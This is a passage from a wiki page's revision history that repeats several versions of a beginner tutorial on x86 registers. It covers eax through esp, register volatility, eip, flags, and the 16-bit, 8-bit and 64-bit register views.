After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3158Registers2012-01-16T03:22:54Z<p>Killboy: /* esp */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the top of the stack (the top is actually at a lower virtual address than the bottom as the stack grows downwards in memory towards the heap). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3157Registers2012-01-16T03:18:48Z<p>Killboy: /* Special Purpose Registers */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
esi is a non-volatile general-purpose register that is often used as a pointer. Specifically, for "rep-" class instructions, which require a source and a destination for data, esi points to the "source". esi often stores data that is used throughout a function because it doesn't change. <br />
<br />
=== edi ===<br />
edi is a non-volatile general-purpose register that is often used as a pointer. It is similar to esi, except that it is generally used as a destination for data. <br />
<br />
=== ebp === <br />
ebp is a non-volatile general-purpose register that has two distinct uses depending on compile settings: it is either the frame pointer or a general purpose register. <br />
<br />
If compilation is not optimized, or code is written by hand, ebp keeps track of where the stack is at the beginning of a function (the stack will be explained in great detail in a later section). Because the stack changes throughout a function, having ebp set to the original value allows variables stored on the stack to be referenced easily. This will be explored in detail when the stack is explained. <br />
<br />
If compilation is optimized, ebp is used as a general register for storing any kind of data, while calculations for the stack pointer are done based on the stack pointer moving (which gets confusing -- luckily, IDA automatically detects and corrects a moving stack pointer!)<br />
<br />
=== esp ===<br />
esp is a special register that stores a pointer to the bottom of the stack (the stack grows towards lower addresses). Math is rarely done directly on esp, and the value of esp must be the same at the beginning and the end of each function. esp will be examined in much greater detail in a later section.<br />
<br />
== Special Purpose Registers ==<br />
=== eip ===<br />
<br />
''eip'', or the instruction pointer, is a special-purpose register which stores a pointer to the address of the instruction that is currently executing. Making a jump is like adding to or subtracting from the instruction pointer. <br />
<br />
After each instruction, a value equal to the size of the instruction is added to eip, which means that eip points at the machine code for the next instruction. This simple example shows the automatic addition to eip at every step:<br />
<br />
eip+1 53 push ebx<br />
eip+4 8B 54 24 08 mov edx, [esp+arg_0]<br />
eip+2 31 DB xor ebx, ebx<br />
eip+2 89 D3 mov ebx, edx<br />
eip+3 8D 42 07 lea eax, [edx+7]<br />
.....<br />
<br />
=== flags ===<br />
In the flags register, each bit has a specific meaning and they are used to store meta-information about the results of previous operations. For example, whether the last calculation overflowed the register or whether the operands were equal. Our interest in the flags register is usually around the ''cmp'' and ''test'' operations which will commonly set or unset the zero, carry and overflow flags.<br />
These flags will then be tested by a conditional jump which may be controlling program flow or a loop.<br />
<br />
== 16-bit and 8-bit Registers ==<br />
<br />
In addition to the 8 32-bit registers available, there are also a number of 16-bit and 8-bit registers. The confusing thing about these registers it that they use the same storage space as the 32-bit registers. In other words, every 16-bit register is half of one of the 32-bit registers, so that changing the 16-bit also changes the 32-bit. Furthermore, the 8-bit registers are part of the 16-bit registers. <br />
<br />
For example, eax is a 32-bit register. The lower half of eax is ax, a 16-bit register. ax is divided into two 8-bit registers, ah and al (a-high and a-low). <br />
<br />
* There are 8 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp.<br />
* There are 8 16-bit registers: ax, bx, cx, dx, si, di, bp, sp.<br />
* There are 8 8-bit registers: ah, al, bh, bl, ch, cl, dh, dl. <br />
<br />
The relationships of these registers is shown in the table below:<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0' width='485'><br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>eax</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ecx</td><br />
<td colspan='1' rowspan='3' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>ax</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>cx</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>dx</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>8-bit</td><br />
<br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ah</td><br />
<td colspan='1' width='25' align='center'>al</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>bh</td><br />
<td colspan='1' width='25' align='center'>bl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>ch</td><br />
<td colspan='1' width='25' align='center'>cl</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>&nbsp;</td><br />
<td colspan='1' width='25' align='center'>dh</td><br />
<td colspan='1' width='25' align='center'>dl</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='20'>&nbsp;</td><br />
</tr><br />
<br />
<tr><br />
<td colspan='1' width='25' align='left'>32-bit</td><br />
<br />
<td colspan='4' width='100' align='center'>esi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>edi</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>ebp</td><br />
<td colspan='1' rowspan='2' width='15'>&nbsp;</td><br />
<td colspan='4' width='100' align='center'>esp</td><br />
</tr><br />
<tr><br />
<td colspan='1' width='25' align='left'>16-bit</td><br />
<br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>si</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>di</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>bp</td><br />
<td colspan='2' width='50' align='center'>&nbsp;</td><br />
<td colspan='2' width='50' align='center'>sp</td><br />
</tr><br />
</table><br />
<br />
Here are two examples:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>eax</td><br />
<td width='100'>0x12345678</td><br />
</tr><br />
<tr><br />
<td>ax</td><br />
<td>0x5678</td><br />
</tr><br />
<tr><br />
<td>ah</td><br />
<td>0x56</td><br />
</tr><br />
<tr><br />
<td>al</td><br />
<td>0x78</td><br />
</tr><br />
</table><br />
<br />
<br />
<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='50'>ebx</td><br />
<td width='100'>0x00000025</td><br />
</tr><br />
<tr><br />
<td>bx</td><br />
<td>0x0025</td><br />
</tr><br />
<tr><br />
<td>bh</td><br />
<td>0x00</td><br />
</tr><br />
<tr><br />
<td>bl</td><br />
<td>0x25</td><br />
</tr><br />
</table><br />
<br />
== 64-bit Registers ==<br />
<br />
A 64-bit register is made by concatenating a pair of 32-bit registers. This is shown by putting a colon between them. <br />
<br />
The most common 64-bit register (used for operations such as division and multiplication) is edx:eax. This means that the 32-bits of edx are put in front of the 32-bits of eax, creating a double-long register, so to speak. <br />
<br />
Here is a simple example:<br />
<table border='1px' cellspacing='0' cellpadding='0'><br />
<tr><br />
<td width='80'>edx</td><br />
<td width='200'>0x11223344</td><br />
</tr><br />
<tr><br />
<td>eax</td><br />
<td>0xaabbccdd</td><br />
</tr><br />
<tr><br />
<td>edx:eax</td><br />
<td>0x11223344aabbccdd</td><br />
</tr><br />
</table><br />
<br />
== Questions ==<br />
Feel free to edit this section and post questions, I'll do my best to answer them. But you may need to contact me to let me know that a question exists.</div>Killboyhttps://wiki.skullsecurity.org/index.php?title=Registers&diff=3156Registers2012-01-16T03:18:30Z<p>Killboy: /* flags */</p>
<hr />
<div>{{Infobox assembly}}<br />
<br />
This section is the first section specific to assembly. So if you're reading through the full guide, get ready for some actual learning! <br />
<br />
A register is like a variable, except that there are a fixed number of registers. Each register is a special spot in the CPU where a single value is stored. A register is the only place where math can be done (addition, subtraction, etc). Registers frequently hold pointers which reference memory. Movement of values between registers and memory is very common. <br />
<br />
Intel assembly has 8 general purpose 32-bit registers: eax, ebx, ecx, edx, esi, edi, ebp, esp. Although any data can be moved between any of these registers, compilers commonly use the same registers for the same uses, and some instructions (such as multiplication and division) can only use the registers they're designed to use. <br />
<br />
Different compilers may have completely different conventions on how the various registers are used. For the purposes of this document, I will discuss the most common compiler, Microsoft's. <br />
<br />
== Volatility ==<br />
Some registers are typically volatile across functions, and others remain unchanged. This is a feature of the compiler's standards and must be looked after in the code, registers are not preserved automatically (although in some assembly languages they are -- but not in x86). What that means is, when a function is called, there is no guarantee that volatile registers will retain their value when the function returns, and it's the function's responsibility to preserve non-volatile registers. <br />
<br />
The conventions used by Microsoft's compiler are:<br />
* '''Volatile''': ecx, edx<br />
* '''Non-Volatile''': ebx, esi, edi, ebp<br />
* '''Special''': eax, esp (discussed later)<br />
<br />
== General Purpose Registers ==<br />
This section will look at the 8 general purpose registers on the x86 architecture. For special purpose and floating point registers, have a look at the [http://en.wikipedia.org/wiki/IA-32 Wikipedia Article] or other reference sites. <br />
<br />
=== eax ===<br />
eax is a 32-bit general-purpose register with two common uses: to store the return value of a function and as a special register for certain calculations. It is technically a volatile register, since the value isn't preserved. Instead, its value is set to the return value of a function before a function returns. Other than esp, this is probably the most important register to remember for this reason. eax is also used specifically in certain calculations, such as multiplication and division, as a special register. That use will be examined in the instructions section. <br />
<br />
Here is an example of a function returning in C:<br />
return 3; // Return the value 3<br />
<br />
Here's the same code in assembly:<br />
mov eax, 3 ; Set eax (the return value) to 3<br />
ret ; Return<br />
<br />
=== ebx ===<br />
ebx is a non-volatile general-purpose register. It has no specific uses, but is often set to a commonly used value (such as 0) throughout a function to speed up calculations. <br />
<br />
=== ecx ===<br />
ecx is a volatile general-purpose register that is occasionally used as a function parameter or as a loop counter. <br />
<br />
Functions of the "__fastcall" convention pass the first two parameters to a function using ecx and edx. Additionally, when calling a member function of a class, a pointer to that class is often passed in ecx no matter what the calling convention is. <br />
<br />
Additionally, ecx is often used as a loop counter. ''for'' loops generally, although not always, set the accumulator variable to ecx. ''rep-'' instructions also use ecx as a counter, automatically decrementing it till it reaches 0. This class of function will be discussed in a later section. <br />
<br />
=== edx ===<br />
edx is a volatile general-purpose register that is occasionally used as a function parameter. Like ecx, edx is used for "__fastcall" functions. <br />
<br />
Besides fastcall, edx is generally used for storing short-term variables within a function. <br />
<br />
=== esi ===<br />
